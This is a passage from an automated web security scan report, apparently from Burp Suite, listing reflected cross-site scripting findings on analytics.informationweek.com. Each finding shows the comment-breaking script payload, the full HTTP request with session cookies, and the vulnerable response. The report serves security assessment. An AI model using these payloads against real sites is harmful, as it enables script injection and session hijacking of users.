3E6a5a5123e13%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794e8b04--><script>alert(1)</script>6a5a5123e13/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html">
...[SNIP]...

3.24. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 7446c--><script>alert(1)</script>3b3d6a8badb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/81/4794/Business-Intelligence-and-Information-Management7446c--><script>alert(1)</script>3b3d6a8badb/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:10 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
t%3E3b3d6a8badb%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management7446c--><script>alert(1)</script>3b3d6a8badb/three-guidelines-for-implementing-mdm.html">
...[SNIP]...

3.25. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 240a5--><script>alert(1)</script>fd524b9da39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html240a5--><script>alert(1)</script>fd524b9da39 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ipt%3Efd524b9da39&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html240a5--><script>alert(1)</script>fd524b9da39">
...[SNIP]...

3.26. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ee31f--><script>alert(1)</script>cb09c6d79c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html?ee31f--><script>alert(1)</script>cb09c6d79c0=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:40:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 49910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
Ecb09c6d79c0%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html?ee31f--><script>alert(1)</script>cb09c6d79c0=1">
...[SNIP]...

3.27. http://analytics.informationweek.com/css/prettyPhoto.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /css/prettyPhoto.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 338e7--><script>alert(1)</script>e2d83de194 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=tnre97ubntibb2bj7fike2n3k4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=dG5yZTk3dWJudGliYjJiajdmaWtlMm4zazQ%3D; expires=Sun, 12-Dec-2010 01:40:04 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css&gateway=true
Content-Type: text/html
Content-Length: 45871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
p%3A%2F%2Fanalytics.informationweek.com%2Fcss338e7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee2d83de194%2FprettyPhoto.css&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css">
...[SNIP]...

3.28. http://analytics.informationweek.com/css/prettyPhoto.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /css/prettyPhoto.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 6cd90--><script>alert(1)</script>e12e4455fca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=un2icj1vppc5e1ft6ln6ajjea1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=dW4yaWNqMXZwcGM1ZTFmdDZsbjZhamplYTE%3D; expires=Sun, 12-Dec-2010 01:40:17 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca&gateway=true
Content-Type: text/html
Content-Length: 45873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
cs.informationweek.com%2Fcss%2FprettyPhoto.css6cd90--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee12e4455fca&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca">
...[SNIP]...

3.29. http://analytics.informationweek.com/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload eb92e--><script>alert(1)</script>cf8dc57c4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=8kjdhka04s54udf46t32jf9tb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=OGtqZGhrYTA0czU0dWRmNDZ0MzJqZjl0YjE%3D; expires=Sun, 12-Dec-2010 01:40:20 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css&gateway=true
Content-Type: text/html
Content-Length: 45859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ce=http%3A%2F%2Fanalytics.informationweek.com%2Fcsseb92e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecf8dc57c4b%2Fstyle.css&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css">
...[SNIP]...

3.30. http://analytics.informationweek.com/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 11fb0--><script>alert(1)</script>769c3628931 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /css/style.css11fb0--><script>alert(1)</script>769c3628931 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=v60t0c8g6r5b9otcadas4hgut1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=djYwdDBjOGc2cjViOW90Y2FkYXM0aGd1dDE%3D; expires=Sun, 12-Dec-2010 01:40:31 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/css/style.css11fb0--><script>alert(1)</script>769c3628931&gateway=true
Content-Type: text/html
Content-Length: 45861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
2F%2Fanalytics.informationweek.com%2Fcss%2Fstyle.css11fb0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E769c3628931&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css/style.css11fb0--><script>alert(1)</script>769c3628931">
...[SNIP]...

3.31. http://analytics.informationweek.com/gsearch [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /gsearch

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 94804--><script>alert(1)</script>7e3b598135e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /gsearch94804--><script>alert(1)</script>7e3b598135e HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:43:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
rvice=http%3A%2F%2Fanalytics.informationweek.com%2Fgsearch94804--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7e3b598135e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/gsearch94804--><script>alert(1)</script>7e3b598135e">
...[SNIP]...

3.32. http://analytics.informationweek.com/index/caslogin [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /index/caslogin

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 73f79--><script>alert(1)</script>30362e0897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index73f79--><script>alert(1)</script>30362e0897/caslogin HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=More%20than%207%20days; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:21:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
http%3A%2F%2Fanalytics.informationweek.com%2Findex73f79--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E30362e0897%2Fcaslogin&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index73f79--><script>alert(1)</script>30362e0897/caslogin">
...[SNIP]...

3.33. http://analytics.informationweek.com/index/caslogin [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /index/caslogin

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload d2619--><script>alert(1)</script>69a69bed269 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index/caslogind2619--><script>alert(1)</script>69a69bed269 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=More%20than%207%20days; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:21:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
%2Fanalytics.informationweek.com%2Findex%2Fcaslogind2619--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E69a69bed269&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index/caslogind2619--><script>alert(1)</script>69a69bed269">
...[SNIP]...

3.34. http://analytics.informationweek.com/join [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /join

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload fcd39--><script>alert(1)</script>3d3330c2607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /joinfcd39--><script>alert(1)</script>3d3330c2607 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:39:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:29 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
gin?service=http%3A%2F%2Fanalytics.informationweek.com%2Fjoinfcd39--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3d3330c2607&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/joinfcd39--><script>alert(1)</script>3d3330c2607">
...[SNIP]...

3.35. http://analytics.informationweek.com/js/getdata.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /js/getdata.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload fbbbc--><script>alert(1)</script>3cd9c91875d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:37:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=ffpt08557c7h3bjgeia111mth1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZmZwdDA4NTU3YzdoM2JqZ2VpYTExMW10aDE%3D; expires=Sun, 12-Dec-2010 01:39:57 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js&gateway=true
Content-Type: text/html
Content-Length: 45861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
